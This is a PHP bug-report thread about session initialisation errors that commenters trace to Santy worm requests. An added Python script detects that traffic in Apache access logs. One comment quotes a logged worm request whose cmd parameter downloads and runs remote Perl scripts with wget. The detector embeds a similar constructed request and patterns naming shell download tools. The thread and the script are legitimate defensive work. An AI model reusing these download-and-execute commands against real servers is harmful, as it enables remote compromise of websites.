ID: 25876
Comment by: mak123 at poczta dot onet dot pl
Reported By: golden at riscom dot com
Status: Assigned
Bug Type: Session related
Operating System: freebsd 4.8
PHP Version: 4.3.9-4.3.10
Assigned To: sas

New Comment:

I found many log lines with:

...&PHPSESSID=http://www.visualcoders.net/spy.gif?.....

or other session variables like osCsid, IDP, sess_id - and there is a huge correlation between the number of such attacks and the time when sessions hang with the 'Failed to initialize...' error. After 50 - 70 such requests in 10 - 15 seconds PHP refused to handle the session_start() function.

Previous Comments:
------------------------------------------------------------------------

[2004-12-28 20:32:21] mak123 at poczta dot onet dot pl

I've added the 'php_value session.save_handler "files"' line to the config file and the errors disappeared.

------------------------------------------------------------------------

[2004-12-28 19:21:28] cruiser at ptcruiserclub dot org

I'm using php 4.3.10 on Apache2.4.20 on Redhat 9.

Lots of this error repeating over and over in the apache error_log:

"PHP Warning: Unknown(): A session is active. You cannot change the session module's ini settings at this time. in Unknown on line 0"

All the errors correlate to the Santy worm attacks on my oscommerce store in the apache access_log:

/index.php?cPath=34&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt

Adding some mod_rewrite rules in httpd.conf to redirect the worm away stopped the errors.

------------------------------------------------------------------------

[2004-12-28 12:33:28] mbi at euro-ip dot net

After the recompile of PHP 4.3.10 with a session.c of 4.3.9, the problems seem to have disappeared. It's quite difficult to be sure, because the problem only occurred once in a while (and it all took off about a week after the initial upgrade).

Some other people, using our services, affected by the problems, tell me that they are gone by now (without setting a session handler via ini_set). I'm quite aware there are some unfixed bugs in the session.c of 4.3.9, but the other way was quite unacceptable for production usage. Maybe somebody with better knowledge of the code should take a look at the changes between 4.3.9 and 4.3.10 in "session.c".

We're using Apache 1.3.33 with PHP 4.3.10, mod_ssl 2.8.22 on FreeBSD 4.10-RELEASE-p3. The current configuration has been rock-solid for months and besides some minor upgrades to Apache, PHP and some minor OS fixes, nothing interesting happened to the systems in question. We also noticed this on all of our frontend shared hosting servers.

------------------------------------------------------------------------

[2004-12-28 10:04:44] voyo+php at spider dot pl

The problem appeared a few days ago on plenty of sites, most of them via mod_rewrite. php 4.3.8dotdeb, apache 1.3.26 (debian packages). I didn't upgrade to 4.3.10, I didn't touch anything! The error shows occasionally, not all the time. Maybe this is caused by some worm activity?

------------------------------------------------------------------------

[2004-12-28 09:26:38] onno at triptic dot nl

Our problems also started about 5 days after the upgrade.

------------------------------------------------------------------------

The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/25876

-- 
Edit this bug report at http://bugs.php.net/?id=25876&edit=1
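Both mak123 and cruiser tie the session warnings to Santy worm traffic in the access log: a session-id parameter (PHPSESSID, osCsid, IDP, sess_id) whose value is a URL rather than a session id, followed by a cmd= parameter carrying wget/perl download-and-execute commands, arriving in bursts of 50 - 70 requests within 10 - 15 seconds. The script below is an added example written for this page; it is not part of the bug report, of PHP, or of any commenter's setup. It parses Apache Common Log Format lines, flags requests that show those two features, and reports per-client bursts over a sliding time window. The log lines it embeds are constructed (documentation-range IP addresses, one request line modelled on the one cruiser quoted), and the parameter list, the 50-request threshold and the 15-second window are assumptions taken from the comments.

```python
import re
from collections import deque
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Session-id query parameters named in the bug report comments (assumption:
# extend the set for other applications' session parameter names).
SESSION_PARAMS = {"phpsessid", "oscsid", "sess_id", "idp"}

# Apache Common Log Format: host ident user [time] "METHOD target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

URL_VALUE = re.compile(r"^(?:https?|ftp)://", re.I)
SHELL_TOOLS = re.compile(r"\b(?:wget|curl|fetch|lynx|perl)\b", re.I)


def parse_query(target):
    """Split the query string on '&' only (never on ';', so an injected shell
    command stays in one value) and percent-decode names and values."""
    _, _, query = target.partition("?")
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def classify(target):
    """Return the reasons a request target matches the pattern quoted in the
    report: a session-id parameter holding a URL, and/or a cmd= parameter
    holding download-and-execute shell commands. Empty list means clean."""
    reasons = []
    for name, value in parse_query(target):
        lname = name.lower()
        if lname in SESSION_PARAMS and URL_VALUE.match(value):
            reasons.append(f"{name} carries a URL instead of a session id")
        elif lname == "cmd" and SHELL_TOOLS.search(value):
            reasons.append("cmd parameter carries shell commands")
    return reasons


def parse_line(line):
    """Parse one CLF line into host/time/target; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"host": m["host"],
            "time": datetime.strptime(m["time"], TIME_FMT),
            "target": m["target"]}


def scan(lines, threshold=50, window=timedelta(seconds=15)):
    """Flag matching requests and find per-host bursts. Lines must be in
    chronological order. Returns (flagged, bursts): flagged is a list of
    (host, time, reasons); bursts maps host -> peak number of flagged
    requests seen inside any span of length `window`, for peaks >= threshold."""
    flagged, recent, peaks = [], {}, {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec["target"])
        if not reasons:
            continue
        flagged.append((rec["host"], rec["time"], reasons))
        q = recent.setdefault(rec["host"], deque())
        q.append(rec["time"])
        while rec["time"] - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        peaks[rec["host"]] = max(peaks.get(rec["host"], 0), len(q))
    return flagged, {h: n for h, n in peaks.items() if n >= threshold}


# Constructed request targets (not taken from a real log).
WORM_TARGET = ("/index.php?cPath=34&osCsid=http://www.visualcoders.net/spy.gif?"
               "&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;perl%20spybot.txt")
BENIGN_TARGET = "/index.php?cPath=34&osCsid=0b2f7c9e4d1a8f3b5c6d7e8f90a1b2c3"


def sample_log():
    """Constructed access log: one legitimate request, 60 worm requests from
    one host inside 10 seconds (the burst the report describes), and two
    isolated worm requests from a second host that stay below the threshold."""
    fmt = '{host} - - [{ts}] "GET {target} HTTP/1.0" 200 512'
    base = datetime(2004, 12, 28, 19, 21, 0, tzinfo=timezone.utc)
    stamp = lambda secs: (base + timedelta(seconds=secs)).strftime(TIME_FMT)
    lines = [fmt.format(host="198.51.100.5", ts=stamp(0), target=BENIGN_TARGET)]
    lines += [fmt.format(host="203.0.113.7", ts=stamp(i // 6), target=WORM_TARGET)
              for i in range(60)]
    lines += [fmt.format(host="192.0.2.9", ts=stamp(30 + i), target=WORM_TARGET)
              for i in range(2)]
    return lines


if __name__ == "__main__":
    flagged, bursts = scan(sample_log())
    print(f"{len(flagged)} worm-pattern requests")
    for host, peak in bursts.items():
        print(f"burst from {host}: {peak} requests in a 15 s window")
```

Feed it a real access log (`scan(open("access_log"))`) sorted by time; the window logic assumes chronological input. The script only identifies the traffic. The mitigations reported in this thread were mod_rewrite rules that redirect matching requests away and pinning session.save_handler to "files"; independently of this bug, PHP's session.use_only_cookies = 1 stops a URL-supplied session id from being accepted in the first place, which removes the vector these requests use.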